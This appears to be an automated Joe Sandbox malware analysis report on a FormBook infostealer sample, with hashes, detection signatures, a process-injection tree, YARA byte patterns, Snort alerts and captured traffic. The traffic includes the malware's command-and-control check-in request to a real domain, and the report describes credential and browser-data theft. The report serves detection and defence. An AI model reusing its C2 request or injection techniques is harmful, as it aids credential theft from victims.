Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
opp.scr.exe

Overview

General Information

Sample name:opp.scr.exe
Analysis ID:1435367
MD5:f7c26f0b2088e0324b019c534686b257
SHA1:98d314090e6c74cd6afc5d2fde7e4dd77d1fe240
SHA256:8ec69eaf10a3043817f153a9ac99d113884d1fe657709b759512b688c5014b8f
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code references suspicious native API functions
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • opp.scr.exe (PID: 412 cmdline: "C:\Users\user\Desktop\opp.scr.exe" MD5: F7C26F0B2088E0324B019C534686B257)
    • opp.scr.exe (PID: 2468 cmdline: "C:\Users\user\Desktop\opp.scr.exe" MD5: F7C26F0B2088E0324B019C534686B257)
      • oOOsxwAhjIw.exe (PID: 6716 cmdline: "C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • dfrgui.exe (PID: 7780 cmdline: "C:\Windows\SysWOW64\dfrgui.exe" MD5: 1167953AFDD83E704CE79B8814E54D69)
          • oOOsxwAhjIw.exe (PID: 6844 cmdline: "C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • chrome.exe (PID: 1868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,10687501719211606552,13801376808827217908,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1993109021.00000000057D0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
  • 0x6d26b:$x1: In$J$ct0r
00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x61937:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x4b7b6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.opp.scr.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        1.2.opp.scr.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        1.2.opp.scr.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.opp.scr.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dc03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17a82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.opp.scr.exe.4146390.2.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6d26b:$x1: In$J$ct0r
          Click to see the 5 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:05/02/24-15:57:10.974353
          SID:2855465
          Source Port:49728
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: opp.scr.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.terelprime.com/ufuh/?p80t2Pu=YGhnx96XAVFPN8tv1lUEEiUVdSmZ/iyWteKDUnkDVIOF49Ku923zDENpH5OUCIyJQHomPTwvfF1wQ0t1Y4t+Kv0hk37pk2XOQoNeMFqeOrHvpWJ1tST0YGmxjRv23ozT3g==&B6bX=zjl0Avira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted file
          Source: opp.scr.exeReversingLabs: Detection: 34%
          Source: opp.scr.exeVirustotal: Detection: 45%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.opp.scr.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: opp.scr.exeJoe Sandbox ML: detected
          Source: opp.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49725 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.5:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49729 version: TLS 1.2
          Source: opp.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: opp.scr.exe, 00000000.00000002.1993405256.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, opp.scr.exe, 00000000.00000002.1992294507.00000000030D1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dfrgui.pdb source: opp.scr.exe, 00000001.00000002.2393570245.0000000001207000.00000004.00000020.00020000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857446926.0000000000988000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dfrgui.pdbGCTL source: opp.scr.exe, 00000001.00000002.2393570245.0000000001207000.00000004.00000020.00020000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857446926.0000000000988000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oOOsxwAhjIw.exe, 00000008.00000002.3856743895.000000000022E000.00000002.00000001.01000000.00000009.sdmp, oOOsxwAhjIw.exe, 0000000A.00000000.2462623860.000000000022E000.00000002.00000001.01000000.00000009.sdmp
          Source: Binary string: wntdll.pdbUGP source: opp.scr.exe, 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2399221068.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.000000000453E000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2391671200.0000000004031000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.00000000043A0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: opp.scr.exe, opp.scr.exe, 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, dfrgui.exe, 00000009.00000003.2399221068.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.000000000453E000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2391671200.0000000004031000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.00000000043A0000.00000040.00001000.00020000.00000000.sdmp

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49728 -> 66.96.161.166:80
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewIP Address: 66.96.161.166 66.96.161.166
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49725 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGIS3zrEGIjAy2SY_wKQfS3Qr9DIp4alnyJkCTUiOIWFLBr4l8U2O7-X7PjrHl9WYNHcJAlxWu-0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-13; NID=513=kagEDjFykvKoAP0yl0sL1kceCdSlsxq38rbJXvvayh012PxpNNXfpbKkzAh7U8g-UcB5j8kSKnHvFbFlm_drDhRUplG0u-yRqpVq4Bp0PrYa_i3zve2NFSHgx-VHdiOxzy44Flbipwim5igaZ1Atm6f83h90MBFNiD0xnZ1XgEU
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGIS3zrEGIjC0v607c_qYvTi5H8NDS3aYuCJmplAqD5Rl0JeJ4_KibV6kPGTEw6xAv1H63aOy6jsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-13; NID=513=kUszvrnp6L6qkzmjnXT8tKxx3ftCnD_6dpqXT5ipG2-oWiOp0NvDcpVBh2C9JkKo8BLayWIpOpc7ZV6jBbijWa6Kaf9YhwSa0O26wBZFBNJ72vCB0pwahmofUaZfvgUD1reQRrLBhzwF9OIRNktjvtbSUw_lRTOAA6eV1N7C-ys
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vPOR2YTmsL7R8cO&MD=bTcn1Cz5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vPOR2YTmsL7R8cO&MD=bTcn1Cz5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /ufuh/?p80t2Pu=YGhnx96XAVFPN8tv1lUEEiUVdSmZ/iyWteKDUnkDVIOF49Ku923zDENpH5OUCIyJQHomPTwvfF1wQ0t1Y4t+Kv0hk37pk2XOQoNeMFqeOrHvpWJ1tST0YGmxjRv23ozT3g==&B6bX=zjl0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.terelprime.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: www.besthomeincome24.com
          Source: global trafficDNS traffic detected: DNS query: www.terelprime.com
          Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714658161007&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 May 2024 13:57:10 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ 